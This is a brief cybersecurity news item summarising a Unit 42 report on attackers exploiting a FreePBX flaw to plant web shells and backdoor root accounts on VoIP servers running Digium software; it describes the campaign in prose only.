"VoIP Servers Being Targeted by Hackers Using Digium Phone Software"

As part of an attack intended to exfiltrate data by downloading and running additional payloads, a web shell was dropped on the servers of VoIP phones running Digium's software. According to a report released by Palo Alto Networks Unit 42, the malware downloads new payloads for execution, installs multilayer obfuscated PHP backdoors into the web server file system, and schedules repeating activities to re-infect the host system. Asterisk, a popular software implementation of a private branch exchange (PBX) that runs on the open-source Elastix Unified Communications Server, is at the center of the unusual behavior said to have begun around the middle of December 2021. By comparing the breaches to the INJ3CTOR3 campaign, Unit 42 suggested that the breaches could be a "resurgence" of earlier attacks. The sudden increase is due to the public disclosure in December 2021 of a now-patched Remote Code Execution (RCE) vulnerability in FreePBX, an open-source web-based Graphical User Interface (GUI) used to monitor and manage Asterisk. The vulnerability, CVE-2021-45461, has a severity rating of 9.8 out of 10. The attacks begin by retrieving the first dropper shell script from a remote server, which is then used to install the PHP web shell in various locations throughout the file system and to create two root user accounts for further remote access. This article continues to discuss hackers' use of Digium phone software to target VoIP servers. 

CyberIntelMag reports "VoIP Servers Being Targeted by Hackers Using Digium Phone Software"